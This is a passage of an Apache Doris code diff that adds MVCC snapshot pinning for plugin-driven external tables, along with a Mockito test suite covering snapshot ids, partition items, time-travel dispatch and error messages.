(same protocol as checkSysTableScanConstraints above). + try { + pinMvccSnapshot(); + } catch (UserException e) { + splitAssignment.setException(e); + return; + } final ConnectorTableHandle handle = currentHandle; final ConnectorScanPlanProvider scanProvider = connector.getScanPlanProvider(); final List allPartitions = @@ -795,6 +865,19 @@ private ScanNodePropertiesResult getOrLoadPropertiesResult() { if (scanProvider != null) { List columns = buildColumnHandles(); Optional filter = buildRemainingFilter(); + // Pin the MVCC snapshot onto currentHandle before getScanNodePropertiesResult + // consumes it: this single cached result feeds the serialized-table (JNI) path, + // scan-level params, explain, and file attributes, so the pin must land here or the + // serialized-table path silently reads LATEST while the split path reads the pin. + // This method is private and called from contexts that do not declare UserException + // (e.g. getNodeExplainString), so a getTargetTable() failure is surfaced by wrapping + // it in a RuntimeException (same unchecked error channel as create() above) rather + // than dropped. + try { + pinMvccSnapshot(); + } catch (UserException e) { + throw new RuntimeException("Failed to pin MVCC snapshot for plugin-driven scan", e); + } cachedPropertiesResult = scanProvider.getScanNodePropertiesResult( connectorSession, currentHandle, columns, filter); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java index afea1bde903b35..bcfb4def169019 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java +++ b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java @@ -144,6 +144,7 @@ import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.datasource.PluginDrivenExternalDatabase; import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.datasource.PluginDrivenMvccExternalTable; import org.apache.doris.datasource.doris.RemoteDorisExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalDatabase; @@ -474,6 +475,8 @@ public class GsonUtils { .registerSubtype(TestExternalTable.class, TestExternalTable.class.getSimpleName()) .registerSubtype(PluginDrivenExternalTable.class, PluginDrivenExternalTable.class.getSimpleName()) + .registerSubtype(PluginDrivenMvccExternalTable.class, + PluginDrivenMvccExternalTable.class.getSimpleName()) .registerCompatibleSubtype( PluginDrivenExternalTable.class, "EsExternalTable") .registerCompatibleSubtype( diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java index 0d419aa4e90e7c..120b1285432216 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java @@ -23,6 +23,7 @@ import org.apache.doris.connector.api.DorisConnectorException; import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.connector.spi.ConnectorMetaInvalidator; @@ -92,13 +93,14 @@ void sessionSessionPropertiesDefaultsToEmpty() { @Test void mvccSnapshotMethodsDefaultToEmpty() { ConnectorTableHandle handle = new ConnectorTableHandle() { }; - // T08: all three mvcc defaults return Optional.empty() — connector opts out of MVCC. + // T08: the mvcc defaults return Optional.empty() — connector opts out of MVCC. The old + // getSnapshotAt/getSnapshotById defaults were retired in B5b-2a and replaced by the unified + // resolveTimeTravel seam, which also defaults to Optional.empty for non-time-travel connectors. Assertions.assertEquals(Optional.empty(), metadata.beginQuerySnapshot(session, handle)); Assertions.assertEquals(Optional.empty(), - metadata.getSnapshotAt(session, handle, 0L)); - Assertions.assertEquals(Optional.empty(), - metadata.getSnapshotById(session, handle, 0L)); + metadata.resolveTimeTravel(session, handle, + ConnectorTimeTravelSpec.snapshotId("1"))); } // ──────────────────── ConnectorSchemaOps defaults ──────────────────── diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java new file mode 100644 index 00000000000000..015fe28d67f828 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java @@ -0,0 +1,841 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.analysis.TableScanParams; +import org.apache.doris.analysis.TableSnapshot; +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.ListPartitionItem; +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.catalog.PartitionKey; +import org.apache.doris.catalog.PartitionType; +import org.apache.doris.catalog.Type; +import org.apache.doris.common.AnalysisException; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.api.mvcc.ConnectorTimeTravelSpec; +import org.apache.doris.datasource.mvcc.MvccSnapshot; +import org.apache.doris.datasource.mvcc.MvccTableInfo; +import org.apache.doris.mtmv.MTMVSnapshotIdSnapshot; +import org.apache.doris.mtmv.MTMVTimestampSnapshot; +import org.apache.doris.nereids.StatementContext; +import org.apache.doris.qe.ConnectContext; + +import org.junit.jupiter.api.AfterEach; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.ArgumentCaptor; +import org.mockito.InOrder; +import org.mockito.Mockito; + +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Tests for {@link PluginDrivenMvccExternalTable}, the generic MVCC/MTMV-capable plugin table. + * + *

    Why these matter: this class is the fe-core MTMV/MvccTable bridge for snapshot-capable + * connectors (Paimon first; later Iceberg/Hudi). It must (1) pin the REAL connector snapshot id for + * incremental MTMV change-detection — a constant would make every refresh see "no change" or "always + * changed"; (2) honor a supplied pin so the whole query reads ONE consistent partition set with no + * extra connector round-trip (single-pin invariant); (3) build partition keys from the RENDERED + * partition name the connector produced (date already a string), not a raw epoch; (4) fall back to + * UNPARTITIONED when a partition fails to build rather than silently pruning to a partial set; and + * (5) dispatch explicit time-travel (FOR VERSION/TIME, tag/branch/incr scan params) source-agnostically + * into a {@link ConnectorTimeTravelSpec}, translate not-found into a user error, and pin the + * schema-AS-OF the snapshot so reads under schema evolution see the historical columns. The class is + * source-agnostic: it is constructed directly here against a mocked connector.

    + */ +public class PluginDrivenMvccExternalTableTest { + + private static final long PINNED_SNAPSHOT_ID = 4242L; + private static final long TS_2024_01_01 = 1_700_000_000_000L; + private static final long TS_2024_02_02 = 1_800_000_000_000L; + + @AfterEach + public void cleanup() { + ConnectContext.remove(); + } + + // ==================== getTableSnapshot: REAL pinned id ==================== + + @Test + public void testGetTableSnapshotReturnsRealPinnedId() throws AnalysisException { + Fixture f = Fixture.partitioned(); + MTMVSnapshotIdSnapshot snap = + (MTMVSnapshotIdSnapshot) f.table.getTableSnapshot(Optional.empty()); + // MUTATION: returning a constant -1 (or any other id) makes this red. The pinned id is what + // MTMV uses to decide whether the base table changed since last refresh. + Assertions.assertEquals(PINNED_SNAPSHOT_ID, snap.getSnapshotVersion(), + "getTableSnapshot must carry the REAL connector snapshot id"); + } + + // ==================== getPartitionSnapshot: timestamp + missing throws ==================== + + @Test + public void testGetPartitionSnapshotReturnsLastModifiedMillis() throws AnalysisException { + Fixture f = Fixture.partitioned(); + MTMVTimestampSnapshot ts = (MTMVTimestampSnapshot) f.table.getPartitionSnapshot( + "dt=2024-01-01", null, Optional.empty()); + // MUTATION: returning the wrong partition's millis (or 0) makes this red. + Assertions.assertEquals(TS_2024_01_01, ts.getSnapshotVersion(), + "partition snapshot must be that partition's lastModifiedMillis"); + } + + @Test + public void testGetPartitionSnapshotMissingThrows() { + Fixture f = Fixture.partitioned(); + // MUTATION: returning a default snapshot instead of throwing makes this red. + Assertions.assertThrows(AnalysisException.class, + () -> f.table.getPartitionSnapshot("dt=1999-12-31", null, Optional.empty()), + "an unknown partition name must raise AnalysisException, not silently succeed"); + } + + // ==================== getNameToPartitionItems: render-from-name parity ==================== + + @Test + public void testGetNameToPartitionItemsBuildsKeyFromRenderedDateName() { + Fixture f = Fixture.partitioned(); + Map items = f.table.getNameToPartitionItems(Optional.empty()); + + Assertions.assertEquals(2, items.size()); + PartitionItem item = items.get("dt=2024-01-01"); + Assertions.assertTrue(item instanceof ListPartitionItem, "expected a ListPartitionItem"); + PartitionKey key = ((ListPartitionItem) item).getItems().get(0); + // MUTATION: if the connector had returned a raw epoch "19723" and we built from that, the + // DATEV2 key would be a different date (or fail to parse). The connector renders the date to + // a string in getPartitionName(), so the key must be 2024-01-01. + Assertions.assertEquals("2024-01-01", key.getKeys().get(0).getStringValue(), + "partition key must be built from the RENDERED date name, not a raw epoch"); + } + + // ==================== single-pin invariant: no re-query when pin supplied ==================== + + @Test + public void testSuppliedPinIsNotReQueried() throws AnalysisException { + Fixture f = Fixture.partitioned(); + // Materialize ONCE (no pin) -> this is the single round-trip we allow. + PluginDrivenMvccSnapshot pin = + (PluginDrivenMvccSnapshot) f.table.loadSnapshot(Optional.empty(), Optional.empty()); + // Reset interaction counters so the verify below only counts post-pin calls. + Mockito.clearInvocations(f.metadata); + + Optional pinOpt = Optional.of(pin); + MTMVSnapshotIdSnapshot snap = (MTMVSnapshotIdSnapshot) f.table.getTableSnapshot(pinOpt); + Map items = f.table.getNameToPartitionItems(pinOpt); + + Assertions.assertEquals(PINNED_SNAPSHOT_ID, snap.getSnapshotVersion()); + Assertions.assertEquals(2, items.size()); + // MUTATION: if getOrMaterialize re-listed when a pin is present, these verifies (zero calls) + // would fail. The whole query must read the SAME materialized view passed in. + Mockito.verify(f.metadata, Mockito.never()) + .beginQuerySnapshot(Mockito.any(), Mockito.any()); + Mockito.verify(f.metadata, Mockito.never()) + .listPartitions(Mockito.any(), Mockito.any(), Mockito.any()); + } + + // ==================== isPartitionInvalid -> UNPARTITIONED ==================== + + @Test + public void testPartitionBuildFailureFallsBackToUnpartitioned() { + // A partition name with 2 values but only 1 partition column (dt) cannot build a key: + // Preconditions.checkState(values.size()==types.size()) fails, it is caught+dropped, so + // listed names(1) != built items(0) -> isPartitionInvalid -> UNPARTITIONED. + Fixture f = Fixture.with(Arrays.asList( + cpi("dt=2024-01-01/region=cn", TS_2024_01_01))); + // MUTATION: returning LIST (ignoring isPartitionInvalid) makes this red; a partial partition + // set must NOT be exposed as a partitioned table (would silently prune rows). + Assertions.assertEquals(PartitionType.UNPARTITIONED, + f.table.getPartitionType(Optional.empty()), + "a dropped (un-parseable) partition must force UNPARTITIONED, not a partial LIST"); + Assertions.assertTrue(f.table.getPartitionColumns(Optional.empty()).isEmpty(), + "partition columns must be empty when the partition set is invalid"); + } + + @Test + public void testValidPartitionSetIsList() { + Fixture f = Fixture.partitioned(); + Assertions.assertEquals(PartitionType.LIST, f.table.getPartitionType(Optional.empty()), + "a fully-built partitioned table must report LIST"); + } + + @Test + public void testDuplicateRenderedNamesCollapseAndStayValid() { + // Two connector partitions that RENDER to the SAME partition name collapse into one entry in + // BOTH name-keyed maps (item + lastModified). isPartitionInvalid compares those two like-keyed + // maps (1 == 1 -> valid), matching legacy PaimonPartitionInfo which keys both maps by name. + Fixture f = Fixture.with(Arrays.asList( + cpi("dt=2024-01-01", TS_2024_01_01), + cpi("dt=2024-01-01", TS_2024_02_02))); + // MUTATION: basing the invalid check on the RAW listed count (parts.size()=2) instead of the + // de-duplicated name-keyed size (1) makes this red — it would falsely force UNPARTITIONED and + // drop the table's partitioning even though every listed partition built successfully. + Assertions.assertEquals(PartitionType.LIST, f.table.getPartitionType(Optional.empty()), + "partitions rendering to the same name must collapse, not force UNPARTITIONED"); + Assertions.assertEquals(1, f.table.getNameToPartitionItems(Optional.empty()).size(), + "the duplicate rendered name must collapse to a single partition item"); + } + + // ==================== loadSnapshot: B5a latest materialize ==================== + + @Test + public void testLoadSnapshotEmptyMaterializes() { + Fixture f = Fixture.partitioned(); + MvccSnapshot snap = f.table.loadSnapshot(Optional.empty(), Optional.empty()); + Assertions.assertNotNull(snap); + Assertions.assertTrue(snap instanceof PluginDrivenMvccSnapshot); + PluginDrivenMvccSnapshot pin = (PluginDrivenMvccSnapshot) snap; + Assertions.assertEquals(PINNED_SNAPSHOT_ID, pin.getConnectorSnapshot().getSnapshotId()); + // B5a latest pin must NOT carry a pinned schema (callers fall back to latest) and must + // materialize the partition maps. MUTATION: pinning a schema or dropping the partition maps + // on the latest path makes this red. + Assertions.assertNull(pin.getPinnedSchema(), + "the B5a latest pin must have a null pinnedSchema (use latest schema)"); + Assertions.assertEquals(2, pin.getNameToPartitionItem().size(), + "the latest pin must carry the materialized partition view"); + } + + @Test + public void testLoadSnapshotNoHandleLatestDegradesToEmptyPin() { + // No connector handle (e.g. table dropped) on the LATEST path: materializeLatest must DEGRADE + // to a valid empty pin (snapshot id -1, empty partition maps) so downstream callers fall back + // to UNPARTITIONED instead of NPE-ing on a null handle. + Fixture f = Fixture.noHandle(); + PluginDrivenMvccSnapshot pin = + (PluginDrivenMvccSnapshot) f.table.loadSnapshot(Optional.empty(), Optional.empty()); + // MUTATION: NPE-ing instead of degrading (dropping the !handleOpt.isPresent() guard) makes this + // red; a wrong sentinel id makes the -1 assertion red. + Assertions.assertEquals(-1L, pin.getConnectorSnapshot().getSnapshotId(), + "the no-handle latest pin must carry the -1 snapshot sentinel"); + Assertions.assertTrue(pin.getNameToPartitionItem().isEmpty(), + "the no-handle latest pin must have an empty partition-item map"); + Assertions.assertTrue(pin.getNameToLastModifiedMillis().isEmpty(), + "the no-handle latest pin must have an empty last-modified map"); + } + + @Test + public void testLoadSnapshotNoHandleTimeTravelThrows() { + // No connector handle on a TIME-TRAVEL request: unlike the latest path it must FAIL LOUD (a + // time-travel read against a missing table cannot degrade to "latest empty"). + Fixture f = Fixture.noHandle(); + RuntimeException e = Assertions.assertThrows(RuntimeException.class, + () -> f.table.loadSnapshot(Optional.of(TableSnapshot.versionOf("7")), Optional.empty())); + // MUTATION: dropping the time-travel no-handle guard (lines ~206-208) makes this red. + Assertions.assertEquals("can not find table for time travel: REMOTE_DB.REMOTE_TBL", + e.getMessage()); + } + + // ==================== loadSnapshot: B5b time-travel spec dispatch ==================== + + @Test + public void testForTimeAsOfDigitalMillisDispatchesTimestampDigital() { + Fixture f = Fixture.timeTravel(); + f.table.loadSnapshot(Optional.of(TableSnapshot.timeOf("1700000000000")), Optional.empty()); + ConnectorTimeTravelSpec spec = f.captureSpec(); + // MUTATION: dispatching VERSION instead of TIME, or digital=false, makes this red — the + // connector would parse epoch-millis as a datetime string. + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TIMESTAMP, spec.getKind()); + Assertions.assertTrue(spec.isDigital(), "an all-digits FOR TIME value is epoch millis"); + Assertions.assertEquals("1700000000000", spec.getStringValue()); + } + + @Test + public void testForTimeAsOfDatetimeStringDispatchesTimestampNonDigital() { + Fixture f = Fixture.timeTravel(); + f.table.loadSnapshot(Optional.of(TableSnapshot.timeOf("2024-01-01 00:00:00")), Optional.empty()); + ConnectorTimeTravelSpec spec = f.captureSpec(); + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TIMESTAMP, spec.getKind()); + // MUTATION: marking a datetime string digital makes this red — the connector would treat it + // as epoch millis instead of parsing it with the session time zone. + Assertions.assertFalse(spec.isDigital(), "a datetime string is NOT epoch millis"); + Assertions.assertEquals("2024-01-01 00:00:00", spec.getStringValue()); + } + + @Test + public void testForVersionAsOfDigitalDispatchesSnapshotId() { + Fixture f = Fixture.timeTravel(); + f.table.loadSnapshot(Optional.of(TableSnapshot.versionOf("123")), Optional.empty()); + ConnectorTimeTravelSpec spec = f.captureSpec(); + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.SNAPSHOT_ID, spec.getKind()); + Assertions.assertEquals("123", spec.getStringValue()); + } + + @Test + public void testForVersionAsOfNonDigitalDispatchesTag() { + Fixture f = Fixture.timeTravel(); + f.table.loadSnapshot(Optional.of(TableSnapshot.versionOf("my_tag")), Optional.empty()); + ConnectorTimeTravelSpec spec = f.captureSpec(); + // MUTATION: always picking SNAPSHOT_ID (ignoring the isDigitalString branch) makes this red. + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TAG, spec.getKind(), + "a non-digital FOR VERSION AS OF is a TAG name, not a snapshot id"); + Assertions.assertEquals("my_tag", spec.getStringValue()); + } + + @Test + public void testScanParamsTagDispatchesTag() { + Fixture f = Fixture.timeTravel(); + TableScanParams params = new TableScanParams(TableScanParams.TAG, + Collections.singletonMap(TableScanParams.PARAMS_NAME, "t1"), Collections.emptyList()); + f.table.loadSnapshot(Optional.empty(), Optional.of(params)); + ConnectorTimeTravelSpec spec = f.captureSpec(); + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.TAG, spec.getKind()); + Assertions.assertEquals("t1", spec.getStringValue()); + } + + @Test + public void testScanParamsBranchDispatchesBranchFromListParams() { + Fixture f = Fixture.timeTravel(); + TableScanParams params = new TableScanParams(TableScanParams.BRANCH, + Collections.emptyMap(), Collections.singletonList("b1")); + f.table.loadSnapshot(Optional.empty(), Optional.of(params)); + ConnectorTimeTravelSpec spec = f.captureSpec(); + // MUTATION: ignoring the listParams extraction path makes this red. + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.BRANCH, spec.getKind()); + Assertions.assertEquals("b1", spec.getStringValue()); + } + + @Test + public void testScanParamsIncrementalDispatchesIncrementalWithParams() { + Fixture f = Fixture.timeTravel(); + Map incr = new HashMap<>(); + incr.put("startSnapshotId", "1"); + incr.put("endSnapshotId", "5"); + TableScanParams params = new TableScanParams(TableScanParams.INCREMENTAL_READ, + incr, Collections.emptyList()); + f.table.loadSnapshot(Optional.empty(), Optional.of(params)); + ConnectorTimeTravelSpec spec = f.captureSpec(); + Assertions.assertEquals(ConnectorTimeTravelSpec.Kind.INCREMENTAL, spec.getKind()); + // MUTATION: dropping the params (or passing list/empty) makes this red — the connector needs + // the raw window arguments to validate and interpret the incremental read. + Assertions.assertEquals(incr, spec.getIncrementalParams()); + } + + @Test + public void testIncrementalPinListsLatestPartitionsAndUsesLatestSchema() { + // RD-2 (B5b-4): @incr is NOT a point-in-time pin. Legacy PaimonExternalTable.getPaimonSnapshotCacheValue + // falls through (neither tag/branch nor FOR VERSION/TIME AS OF) to getLatestSnapshotCacheValue — the + // LATEST partition view + LATEST schema — and applies the incremental window at scan time. The bridge + // must mirror that: POPULATE the partition maps (unlike snapshot/tag/timestamp/branch, which stay + // EMPTY) and use the LATEST schema (pinnedSchema == null). + Fixture f = Fixture.timeTravel(); + Map incr = new HashMap<>(); + incr.put("startSnapshotId", "1"); + incr.put("endSnapshotId", "5"); + TableScanParams params = new TableScanParams(TableScanParams.INCREMENTAL_READ, + incr, Collections.emptyList()); + + PluginDrivenMvccSnapshot pin = (PluginDrivenMvccSnapshot) f.table.loadSnapshot( + Optional.empty(), Optional.of(params)); + + // The pin carries the connector-resolved snapshot (which holds the incremental-between scan options + // threaded onto the handle at scan time via applySnapshot). + Assertions.assertSame(f.resolvedSnapshot, pin.getConnectorSnapshot()); + + // MUTATION: routing @incr through the EMPTY-map time-travel path (like snapshot/tag) leaves these + // empty -> red. @incr must list the LATEST partitions (the two fixture partitions). + Assertions.assertEquals(2, pin.getNameToPartitionItem().size(), + "@incr must list the LATEST partitions (parity legacy getLatestSnapshotCacheValue)"); + Assertions.assertEquals(TS_2024_01_01, pin.getNameToLastModifiedMillis().get("dt=2024-01-01")); + Assertions.assertEquals(TS_2024_02_02, pin.getNameToLastModifiedMillis().get("dt=2024-02-02")); + Assertions.assertFalse(pin.isPartitionInvalid(), + "a fully-built latest partition set must not be flagged invalid"); + Mockito.verify(f.metadata).listPartitions(Mockito.any(), Mockito.any(), Mockito.any()); + + // @incr uses the LATEST schema, NOT an at-snapshot schema: pinnedSchema must be null so + // getSchemaCacheValue() falls back to latest. MUTATION: resolving a schema-at-snapshot for @incr + // (the snapshot/tag/branch path) sets a non-null pinnedSchema and invokes applySnapshot/getTableSchema + // -> these go red. + Assertions.assertNull(pin.getPinnedSchema(), + "@incr reads the LATEST schema; pinnedSchema must be null"); + Mockito.verify(f.metadata, Mockito.never()).getTableSchema(Mockito.any(), Mockito.any(), + Mockito.any(ConnectorMvccSnapshot.class)); + Mockito.verify(f.metadata, Mockito.never()).applySnapshot(Mockito.any(), Mockito.any(), + Mockito.any()); + } + + @Test + public void testExtractBranchOrTagNameErrors() { + Fixture f = Fixture.timeTravel(); + // Non-empty mapParams missing the 'name' key. + TableScanParams missingName = new TableScanParams(TableScanParams.TAG, + Collections.singletonMap("other", "x"), Collections.emptyList()); + IllegalArgumentException e1 = Assertions.assertThrows(IllegalArgumentException.class, + () -> f.table.loadSnapshot(Optional.empty(), Optional.of(missingName))); + Assertions.assertEquals("must contain key 'name' in params", e1.getMessage()); + + // Empty mapParams AND empty listParams. + TableScanParams empty = new TableScanParams(TableScanParams.TAG, + Collections.emptyMap(), Collections.emptyList()); + IllegalArgumentException e2 = Assertions.assertThrows(IllegalArgumentException.class, + () -> f.table.loadSnapshot(Optional.empty(), Optional.of(empty))); + Assertions.assertEquals("must contain a branch/tag name in params", e2.getMessage()); + } + + @Test + public void testMutualExclusionBothPresentThrows() { + Fixture f = Fixture.timeTravel(); + RuntimeException e = Assertions.assertThrows(RuntimeException.class, + () -> f.table.loadSnapshot(Optional.of(TableSnapshot.versionOf("1")), + Optional.of(new TableScanParams(TableScanParams.TAG, + Collections.singletonMap(TableScanParams.PARAMS_NAME, "t1"), + Collections.emptyList())))); + // MUTATION: silently choosing one over the other makes this red. + Assertions.assertEquals("Can not specify scan params and table snapshot at same time.", + e.getMessage()); + } + + // ==================== loadSnapshot: not-found translation ==================== + + @Test + public void testNotFoundTranslationSnapshotId() { + assertNotFound(TableSnapshot.versionOf("999"), Optional.empty(), + "can't find snapshot by id: 999"); + } + + @Test + public void testNotFoundTranslationTag() { + assertNotFound(TableSnapshot.versionOf("no_such_tag"), Optional.empty(), + "can't find snapshot by tag: no_such_tag"); + } + + @Test + public void testNotFoundTranslationBranch() { + TableScanParams params = new TableScanParams(TableScanParams.BRANCH, + Collections.emptyMap(), Collections.singletonList("no_such_branch")); + assertNotFound(null, Optional.of(params), "can't find branch: no_such_branch"); + } + + @Test + public void testNotFoundTranslationTimestamp() { + // The TIMESTAMP branch of notFoundMessage carries a DOCUMENTED intentional divergence from + // legacy's detailed "...the earliest snapshot's timestamp is [...]" text (the connector owns + // the parsed millis + earliest snapshot, which fe-core cannot see). Pin its exact text. + // MUTATION: relabeling the TIMESTAMP case to another kind's text (or the default) makes this red. + assertNotFound(TableSnapshot.timeOf("2024-01-01 00:00:00"), Optional.empty(), + "can't find snapshot earlier than or equal to time: 2024-01-01 00:00:00"); + } + + private void assertNotFound(TableSnapshot ts, Optional sp, String expectedMsg) { + Fixture f = Fixture.timeTravel(); + // Connector resolves the spec to "not found". + Mockito.when(f.metadata.resolveTimeTravel(Mockito.any(), Mockito.any(), Mockito.any())) + .thenReturn(Optional.empty()); + Optional tsOpt = ts == null ? Optional.empty() : Optional.of(ts); + RuntimeException e = Assertions.assertThrows(RuntimeException.class, + () -> f.table.loadSnapshot(tsOpt, sp)); + // MUTATION: a generic / wrong-kind message makes this red — the user error must name the + // exact missing target. + Assertions.assertEquals(expectedMsg, e.getMessage()); + } + + // ==================== loadSnapshot: successful time-travel pin ==================== + + @Test + public void testSuccessfulTimeTravelPinsSnapshotAndAtSnapshotSchemaNoPartitions() { + Fixture f = Fixture.timeTravel(); + PluginDrivenMvccSnapshot pin = (PluginDrivenMvccSnapshot) f.table.loadSnapshot( + Optional.of(TableSnapshot.versionOf("7")), Optional.empty()); + + // The returned pin carries the connector-resolved snapshot. + Assertions.assertSame(f.resolvedSnapshot, pin.getConnectorSnapshot()); + Assertions.assertEquals(Fixture.TT_SCHEMA_ID, pin.getSchemaId()); + // MUTATION: listing partitions for time-travel makes these maps non-empty (red) and the + // verify(never) below catches the listPartitions call. + Assertions.assertTrue(pin.getNameToPartitionItem().isEmpty(), + "time-travel reads must NOT list partitions"); + Assertions.assertTrue(pin.getNameToLastModifiedMillis().isEmpty(), + "time-travel reads must NOT list partitions"); + Mockito.verify(f.metadata, Mockito.never()) + .listPartitions(Mockito.any(), Mockito.any(), Mockito.any()); + + // The pinned schema must be the AT-SNAPSHOT schema (column "v1"), NOT the latest fixture + // schema (column "dt"). MUTATION: pinning the latest schema instead of the at-snapshot one + // makes this red. + PluginDrivenSchemaCacheValue pinned = (PluginDrivenSchemaCacheValue) pin.getPinnedSchema(); + Assertions.assertNotNull(pinned); + Assertions.assertEquals(1, pinned.getSchema().size()); + Assertions.assertEquals("v1", pinned.getSchema().get(0).getName(), + "the pinned schema must reflect getTableSchema(..., snapshot), not the latest schema"); + } + + @Test + public void testBranchAppliesSnapshotBeforeResolvingSchema() { + Fixture f = Fixture.timeTravel(); + TableScanParams params = new TableScanParams(TableScanParams.BRANCH, + Collections.emptyMap(), Collections.singletonList("b1")); + f.table.loadSnapshot(Optional.empty(), Optional.of(params)); + + // applySnapshot was invoked, and getTableSchema(...,snapshot) was called with the handle + // RETURNED by applySnapshot (the branch-aware handle), not the base handle. MUTATION: calling + // getTableSchema with the base handle resolves the branch schemaId against the base table's + // schemaManager = wrong schema, and makes this red. + Mockito.verify(f.metadata).applySnapshot(Mockito.any(), Mockito.eq(f.handle), + Mockito.eq(f.resolvedSnapshot)); + Mockito.verify(f.metadata).getTableSchema(Mockito.any(), Mockito.eq(f.pinnedHandle), + Mockito.eq(f.resolvedSnapshot)); + // Make the apply-BEFORE-getTableSchema ordering explicit (not just implied by data-flow): + // applySnapshot must thread the pin onto the handle FIRST, so the branch-aware pinnedHandle is + // what getTableSchema resolves the schema against. MUTATION: resolving the schema before/without + // applySnapshot (or swapping the order) makes this red. + InOrder ord = Mockito.inOrder(f.metadata); + ord.verify(f.metadata).applySnapshot(Mockito.any(), Mockito.eq(f.handle), + Mockito.eq(f.resolvedSnapshot)); + ord.verify(f.metadata).getTableSchema(Mockito.any(), Mockito.eq(f.pinnedHandle), + Mockito.eq(f.resolvedSnapshot)); + } + + // ==================== getSchemaCacheValue: schema-at-snapshot override ==================== + + @Test + public void testGetSchemaCacheValueReturnsPinnedSchemaWhenContextPinned() { + Fixture f = Fixture.timeTravel(); + PluginDrivenSchemaCacheValue pinnedSchema = new PluginDrivenSchemaCacheValue( + Collections.singletonList(new Column("v1", Type.INT)), + Collections.emptyList(), Collections.emptyList()); + PluginDrivenMvccSnapshot pin = new PluginDrivenMvccSnapshot(f.resolvedSnapshot, + Collections.emptyMap(), Collections.emptyMap(), pinnedSchema); + + withContextSnapshot(f.table, pin, () -> { + Optional got = f.table.getSchemaCacheValue(); + // MUTATION: ignoring the context pin (returning latest) makes this red. + Assertions.assertTrue(got.isPresent()); + Assertions.assertSame(pinnedSchema, got.get(), + "a context pin with a pinnedSchema must yield the schema AS OF the snapshot"); + }); + } + + @Test + public void testGetSchemaCacheValueFallsBackToLatestWhenPinHasNullSchema() { + Fixture f = Fixture.timeTravel(); + // A B5a latest pin (pinnedSchema == null). + PluginDrivenMvccSnapshot pin = new PluginDrivenMvccSnapshot(f.resolvedSnapshot, + Collections.emptyMap(), Collections.emptyMap(), null); + + withContextSnapshot(f.table, pin, () -> { + Optional got = f.table.getSchemaCacheValue(); + // MUTATION: returning the (null) pinned schema instead of falling back to latest makes + // this red; a B5a latest pin must read the latest schema. + Assertions.assertTrue(got.isPresent()); + Assertions.assertSame(f.latestCacheValue, got.get(), + "a pin with a null pinnedSchema must fall back to the latest schema"); + }); + } + + @Test + public void testGetSchemaCacheValueFallsBackToLatestWhenNoPin() { + Fixture f = Fixture.timeTravel(); + // No ConnectContext at all -> no pin -> latest. + Optional got = f.table.getSchemaCacheValue(); + Assertions.assertTrue(got.isPresent()); + Assertions.assertSame(f.latestCacheValue, got.get(), + "with no context pin getSchemaCacheValue must return the latest schema"); + } + + // ==================== getNewestUpdateVersionOrTime: max, bypass pin ==================== + + @Test + public void testGetNewestUpdateVersionOrTimeMaxAndBypassesPin() throws AnalysisException { + Fixture f = Fixture.partitioned(); + // Pin a CONTEXT snapshot whose nameToLastModifiedMillis carries a max (Long.MAX_VALUE) that is + // strictly LARGER than the fresh LATEST listing's max (TS_2024_02_02). getNewestUpdateVersionOrTime + // takes no snapshot arg and must NOT read this pin: it calls materializeLatest() directly, + // re-listing live. + PluginDrivenMvccSnapshot contextPin = new PluginDrivenMvccSnapshot( + ConnectorMvccSnapshot.builder().snapshotId(PINNED_SNAPSHOT_ID).build(), + Collections.emptyMap(), + Collections.singletonMap("dt=2099-12-31", Long.MAX_VALUE)); + + long[] newest = new long[1]; + withContextSnapshot(f.table, contextPin, () -> { + newest[0] = 